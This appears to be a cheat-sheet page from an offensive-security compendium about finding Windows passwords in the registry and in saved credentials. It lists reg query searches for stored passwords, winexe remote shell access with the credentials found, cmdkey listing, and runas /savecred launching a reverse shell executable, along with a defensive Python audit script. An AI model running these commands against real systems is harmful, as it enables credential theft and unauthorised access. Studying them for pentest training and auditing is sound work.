killchain-compendium/exploit/windows/docs/password_in_registry.md


2021-10-16 00:40:15 +02:00
# Password Inside Registry Key
* Search `HKLM` recursively for string values that mention `password`
```sh
reg query HKLM /f password /t REG_SZ /s
```
* Admin autologon credentials are stored under the Winlogon key
```sh
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
```
* On the attacker machine, replace the credentials in the command with the ones found on the target
```sh
winexe -U 'admin%password' //<target-IP> cmd.exe
```
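
From the defender's side, the same two `reg query` commands can be run as an audit and their output triaged automatically. The following is an added example, not part of the original cheat sheet: it parses `reg query` text output and reports non-empty password values and plaintext autologon without echoing the secret. The sample output, the `ExampleVendor` key and the rule names are constructed for illustration.

```python
import re

# Constructed sample of `reg query` output, not captured from a real host.
SAMPLE = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\winlogon
    AutoAdminLogon    REG_SZ    1
    DefaultUserName    REG_SZ    admin
    DefaultPassword    REG_SZ    Example-Passw0rd
    Shell    REG_SZ    explorer.exe

HKEY_LOCAL_MACHINE\SOFTWARE\ExampleVendor\Agent
    ProxyPassword    REG_SZ
    InstallDir    REG_SZ    C:\Program Files\ExampleVendor
"""

# Value lines are indented: name, type and data separated by four spaces.
VALUE_RE = re.compile(
    r"^\s+(?P<name>.+?)\s{4}(?P<type>REG_[A-Z_]+)(?:\s{4}(?P<data>.*))?$")


def parse_reg_query(text):
    """Return {key_path: {value_name_lower: data}} from `reg query` output."""
    keys, current = {}, None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            current = keys.setdefault(line.strip(), {})
        elif current is not None and (m := VALUE_RE.match(line.rstrip())):
            # Registry value names are case-insensitive, so normalise them.
            current[m["name"].lower()] = (m["data"] or "").strip()
    return keys


def audit(keys):
    """Return findings as (rule, key, detail); secret data is never echoed."""
    findings = []
    for key, values in keys.items():
        for name, data in values.items():
            if "password" in name and data:  # empty values are not findings
                findings.append(("plaintext-secret", key, name))
        if key.lower().endswith(r"\currentversion\winlogon"):
            if values.get("autoadminlogon") == "1" and values.get("defaultpassword"):
                findings.append(
                    ("autologon-plaintext", key, values.get("defaultusername", "")))
    return findings


if __name__ == "__main__":
    for rule, key, detail in audit(parse_reg_query(SAMPLE)):
        print(f"{rule}: {key} ({detail})")
```
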
## List Other Credentials
* List credentials saved in the Windows Credential Manager
```sh
cmdkey /list
```
* Run the reverse shell executable as the user whose credentials are saved
```sh
runas /savecred /user:admin C:\shell.exe
```